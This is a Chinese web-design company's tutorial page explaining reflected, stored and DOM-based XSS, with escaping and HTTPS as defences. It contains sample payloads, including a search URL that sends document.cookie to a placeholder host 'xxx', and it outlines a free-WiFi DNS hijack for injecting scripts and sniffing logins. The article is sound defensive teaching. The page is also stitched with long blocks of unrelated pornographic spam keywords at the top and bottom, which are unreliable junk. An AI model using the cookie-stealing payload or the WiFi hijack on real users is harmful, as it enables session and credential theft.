国产馆av播放_美女国内精品自产拍在线播放 _青青精品视频播放_亚州国产精品久久久_国产原创精品视频_亚洲免费视频观看_久久久亚洲精华液精华液精华液_欧美xxx久久

億萬聯(lián)合 — 專業(yè)網(wǎng)站建設(shè)服務(wù)商 17786980340
您的位置:首頁 > 資訊 > 網(wǎng)絡(luò)學(xué)堂

網(wǎng)站安全之XSS攻擊

發(fā)布時間:2017年08月07日作者:波哥 瀏覽:11558

XSS(cross-site scripting跨域腳本攻擊)攻擊是最常見的Web攻擊,其重點是“跨域”和“客戶端執(zhí)行”。

有人將XSS攻擊分為三種,分別是:

1. Reflected XSS(基于反射的XSS攻擊)

2. Stored XSS(基于存儲的XSS攻擊)

3. DOM-based or local XSS(基于DOM或本地的XSS攻擊)


Reflected XSS

基于反射的XSS攻擊,主要依靠站點服務(wù)端返回腳本,在客戶端觸發(fā)執(zhí)行從而發(fā)起Web攻擊。

例子:

1. 做個假設(shè),當(dāng)亞馬遜在搜索書籍,搜不到書的時候顯示提交的名稱。

2. 在搜索框搜索內(nèi)容,填入“<script>alert('handsome boy')</script>”, 點擊搜索。

3. 當(dāng)前端頁面沒有對返回的數(shù)據(jù)進行過濾,直接顯示在頁面上, 這時就會alert那個字符串出來。

4. 進而可以構(gòu)造獲取用戶cookies的地址,通過QQ群或者垃圾郵件,來讓其他人點擊這個地址:

http://www.amazon.cn/search?name=<script>document.location='http://xxx/get?cookie='+document.cookie</script>

PS:這個地址當(dāng)然是沒效的,只是舉例子而已。

結(jié)論:

如果只是1、2、3步做成功,那也只是自己折騰自己而已,如果第4步能做成功,才是個像樣的XSS攻擊。

開發(fā)安全措施:

1. 前端在顯示服務(wù)端數(shù)據(jù)時候,不僅是標(biāo)簽內(nèi)容需要過濾、轉(zhuǎn)義,就連屬性值也都可能需要。

2. 后端接收請求時,驗證請求是否為攻擊請求,攻擊則屏蔽。

例如:

標(biāo)簽:

<span><script>alert('handsome boy')</script></span>
轉(zhuǎn)義
<span>&lt;script&gt;alert(&#39;handsome boy&#39;)&lt;/script&gt</span>
屬性:

如果一個input的value屬性值是

瑯琊榜" onclick="javascript:alert('handsome boy')
就可能出現(xiàn)

<input type="text" value="瑯琊榜" onclick="javascript:alert('handsome boy')">

點擊input導(dǎo)致攻擊腳本被執(zhí)行,解決方式可以對script或者雙引號進行過濾。


Stored XSS

基于存儲的XSS攻擊,是通過發(fā)表帶有惡意跨域腳本的帖子/文章,從而把惡意腳本存儲在服務(wù)器,每個訪問該帖子/文章的人就會觸發(fā)執(zhí)行。

例子:

1. 發(fā)一篇文章,里面包含了惡意腳本

今天天氣不錯啊!<script>alert('handsome boy')</script>
2. 后端沒有對文章進行過濾,直接保存文章內(nèi)容到數(shù)據(jù)庫。


3. 當(dāng)其他看這篇文章的時候,包含的惡意腳本就會執(zhí)行。

PS:因為大部分文章是保存整個HTML內(nèi)容的,前端顯示時候也不做過濾,就極可能出現(xiàn)這種情況。

結(jié)論:

后端盡可能對提交數(shù)據(jù)做過濾,在場景需求而不過濾的情況下,前端就需要做些處理了。

開發(fā)安全措施:

1. 首要是服務(wù)端要進行過濾,因為前端的校驗可以被繞過。

2. 當(dāng)服務(wù)端不校驗時候,前端要以各種方式過濾里面可能的惡意腳本,例如script標(biāo)簽,將特殊字符轉(zhuǎn)換成HTML編碼。

DOM-based or local XSS

基于DOM或本地的XSS攻擊。一般是提供一個免費的wifi,但是提供免費wifi的網(wǎng)關(guān)會往你訪問的任何頁面插入一段腳本或者是直接返回一個釣魚頁面,從而植入惡意腳本。這種直接存在于頁面,無須經(jīng)過服務(wù)器返回就是基于本地的XSS攻擊。


例子1:
1. 提供一個免費的wifi。
1. 開啟一個特殊的DNS服務(wù),將所有域名都解析到我們的電腦上,并把Wifi的DHCP-DNS設(shè)置為我們的電腦IP。
2. 之后連上wifi的用戶打開任何網(wǎng)站,請求都將被我們截取到。我們根據(jù)http頭中的host字段來轉(zhuǎn)發(fā)到真正服務(wù)器上。
3. 收到服務(wù)器返回的數(shù)據(jù)之后,我們就可以實現(xiàn)網(wǎng)頁腳本的注入,并返回給用戶。
4. 當(dāng)注入的腳本被執(zhí)行,用戶的瀏覽器將依次預(yù)加載各大網(wǎng)站的常用腳本庫。


PS:例子和圖片來自,http://www.cnblogs.com/index-html/p/wifi_hijack_3.html 不是我寫的,請注意!
這個其實就是wifi流量劫持,中間人可以看到用戶的每一個請求,可以在頁面嵌入惡意代碼,使用惡意代碼獲取用戶的信息,可以返回釣魚頁面。



例子2:
1. 還是提供一個免費wifi
2. 在我們電腦上進行抓包
3. 分析數(shù)據(jù),可以獲取用戶的微信朋友圈、郵箱、社交網(wǎng)站帳號數(shù)據(jù)(HTTP)等。


PS:這個是我的測試,在51job頁面登錄時進行抓包,可以獲取帳號密碼。



結(jié)論:
這攻擊其實跟網(wǎng)站本身沒有什么關(guān)系,只是數(shù)據(jù)被中間人獲取了而已,而由于HTTP是明文傳輸?shù)模允菢O可能被竊取的。


開發(fā)安全措施:
1. 使用HTTPS!就跟我前面《HTTP與HTTPS握手的那些事》這篇文章說的,HTTPS會在請求數(shù)據(jù)之前進行一次握手,使得客戶端與服務(wù)端都有一個私鑰,服務(wù)端用這個私鑰加密,客戶端用這個私鑰解密,這樣即使數(shù)據(jù)被人截取了,也是加密后的數(shù)據(jù)。

總結(jié)

XSS攻擊的特點就是:盡一切辦法在目標(biāo)網(wǎng)站上執(zhí)行非目標(biāo)網(wǎng)站上原有的腳本(某篇文章說的)。本地的XSS攻擊的示例2其實不算XSS攻擊,只是簡單流量劫持。前兩種XSS攻擊是我們開發(fā)時候要注意的,而流量劫持的則可以使用HTTPS提高安全性。

870
分類:

您還沒有登錄,請先登錄

4008-4008-80

027-87827780

請點擊QQ圖標(biāo)咨詢客服;為避免丟失消息,請?zhí)砑観Q好友
提交需求
一本本久综合久久爱| 日本久久久网站| 日产精品久久久| 欧美猛烈性xbxbxbxb| 狠狠色狠狠色综合系列| 欧美精品一区二区免费| 少妇欧美激情一区二区三区| 色aⅴ色av色av偷拍| 欧美破处大片在线视频| 亚洲乱码一区av黑人高潮| 特级西西444www| ·天天天天操| 免费观看日韩电影| 久久亚洲精品一区二区| 激情se五月| 亚洲在线视频一区二区| 欧美国产日产图区| 亚洲91精品| 一本大道av伊人久久综合| 婷婷久久青草热一区二区| 亚洲成人第一区| 四虎影视成人精品国库在线观看 | 国产99久久精品一区二区300| 亚洲二区在线观看| 可以在线看黄的网站| 亚洲精品人成电影网| 欧美视频免费| 色偷偷噜噜噜亚洲男人的天堂| 国产艳妇疯狂做爰视频| 最新av在线网站| 成人丝袜18视频在线观看| 亚洲a区在线视频| 精品国产乱子伦| vam成人资源在线观看| 8x福利精品第一导航| 嫩草视频免费在线观看| 黄色直播在线| 成人av在线观| 久久久久久欧美精品色一二三四| www男人的天堂| 日韩欧美中文字幕电影| 亚洲美女在线视频| 香蕉久久久久久久| av资源中文在线| 一本大道综合伊人精品热热| 激情网站五月天| 一级毛片免费看| 久久麻豆一区二区| 亚洲一区三区电影在线观看| 国产欧美一区二区三区小说| 国产偷自视频区视频一区二区| 久久久久久久亚洲精品| 69视频免费在线观看| 亚洲网站免费| 精品亚洲国产视频| 性欧美疯狂猛交69hd| 影视一区二区三区| 日韩美女视频在线| 最新日韩av在线| 999国产精品| 91亚洲天堂| 欧美性受黑人性爽| 少妇一级淫片免费放中国| 农村妇女一区二区| 精品少妇一区二区三区日产乱码| av无码精品一区二区三区| 又黄又www的网站| 国产午夜亚洲精品不卡| 中文字幕日韩精品无码内射| 99不卡视频| 国产欧美精品一区二区色综合| 日韩区国产区| 免费看黄色的视频| 免费亚洲精品视频| 欧美日韩不卡在线| 久久天天做天天爱综合色| 亚洲黄色毛片| 99视频在线观看地址| 丁香一区二区| 最新69国产成人精品视频免费| 中国1级黄色片| 色8久久久久| 中文字幕自拍vr一区二区三区| 91嫩草丨国产丨精品| 精品国产乱码久久久久久樱花| 亚洲精品美女久久| 日韩欧美不卡视频| 夜夜春成人影院| 日本精品久久电影| 韩国av免费在线观看| 国产精品美女| 欧美黄色一区| av在线播放成人| 免费看污污视频| 三级性生活视频| 亚洲最大色综合成人av| 欧美巨乳美女视频| 91免费看视频| 亚洲视频一区二区在线| 97超碰人人爽| 第一福利在线视频| 亚洲加勒比久久88色综合| 日本在线视频免费观看| 日本久久黄色| 亚洲自拍av在线| 樱花草www在线观看| 久久久久国产成人精品亚洲午夜| 亚洲第一精品福利| 神马影院我不卡午夜| 最新中文字幕av专区| 亚洲一区二区三区视频在线| 亚洲成a人无码| 久久久久久久性潮| 久久久久久18| 亚洲欧美日韩色图| 99国产精品国产精品毛片| 黑森林福利视频导航| 亚洲丝袜精品| 亚洲午夜国产成人av电影男同| 精品少妇久久久久久888优播| 色婷婷综合久久久久久| 国产欧美日韩视频| 先锋av资源| 欧美日韩在线免费| 青娱乐国产在线视频| 香蕉视频国产精品| 日韩av图片| 蜜桃视频在线观看视频| 91精品国产麻豆国产自产在线| 免费观看一级视频| 亚洲精品色图| 欧美精品在欧美一区二区| 日本在线观看www| 亚洲欧洲在线看| 婷婷综合激情网| 91美女在线视频| 一起草在线视频| 偷拍自拍一区| 韩日午夜在线资源一区二区| 日韩一二三四| 亚洲精品久久久久久久久久久久| 中文字幕一区二区三区波野结 | 久久久人成影片免费观看| 欧美资源一区| 久草免费在线观看| 在线精品播放av| 午夜国产一级| 一区二区久久久久久| 亚洲天堂一级片| 国产欧美日本| 18久久久久久| 免费看毛片网站| 久久精品国产99国产| 538在线视频观看| 免费一级欧美片在线观看网站| 奇米4444一区二区三区 | 中文字幕第4页| 中文字幕免费精品| 国产精品88久久久久久妇女| 韩日毛片在线观看| 日韩av不卡电影| 永久www成人看片| 日韩毛片中文字幕| 欧美性另类69xxxx| 五月天国产精品| 一级黄色在线观看| 成人午夜电影网站| 精品少妇一区二区三区免费观| 第四色成人网| 日韩精品第1页| 亚洲老司机网| 国产伦精品一区二区三区视频孕妇 | 成人情趣视频| 中文字幕一区二区三区有限公司| 懂色av中文在线| 久久中文字幕在线| www.jizz在线观看| 日韩免费视频一区二区| 日本一线产区和二线产区| 亚洲综合激情另类小说区| 波多野结衣啪啪| 久久综合成人精品亚洲另类欧美| 好吊视频在线观看| 国产精品色网| 国产精久久久久| 欧美日韩一区自拍| 亚洲精品午夜在线观看| 国产欧美日韩一区二区三区四区| 日韩欧美电影一区二区| 成人黄色免费短视频| 成人综合在线观看| www成人啪啪18软件| 丝袜诱惑制服诱惑色一区在线观看| 欧美污视频网站| 国产一区日韩| a在线视频观看| 精品大片一区二区| 狠狠操精品视频| 午夜影院欧美| 激情 小说 亚洲 图片: 伦|